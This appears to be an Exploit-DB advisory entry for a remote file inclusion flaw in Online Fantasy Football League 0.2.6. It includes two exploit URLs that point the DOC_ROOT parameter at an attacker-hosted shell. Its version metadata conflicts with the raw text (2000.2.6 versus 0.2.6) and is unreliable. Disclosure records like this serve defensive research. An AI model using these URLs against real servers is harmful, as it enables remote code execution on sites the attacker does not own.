Multiple Remote File Inclusion Vulnerability

vendor:

Online Fantasy Football League

by:

MhZ91

5.5

CVSS

MEDIUM

Remote File Inclusion

CWE

Product Name: Online Fantasy Football League

Affected Version From: 2000.2.6

Affected Version To: 2000.2.6

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Multiple Remote File Inclusion Vulnerability

The exploit allows an attacker to include remote files on the target server.

Mitigation:

The vulnerability can be mitigated by properly sanitizing user input and implementing strong access controls.

Source

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          
---------------------------------------------------------------
Http://www.inj3ct-it.org     Staff[at]inj3ct-it[dot]org 
---------------------------------------------------------------
 Multiple Remote File Inclusion Vulnerability
---------------------------------------------------------------
# Author: MhZ91 nobody.91@hotmail.it
# Download Script: http://sourceforge.net/projects/offl/ Online Fantasy Football League 0.2.6
# Exploit:
# http://[target]/[path]/lib/functions.php?DOC_ROOT=[Shell]
# http://[target]/[path]/lib/header.php?DOC_ROOT=[Shell]
---------------------------------------------------------------

# milw0rm.com [2007-09-07]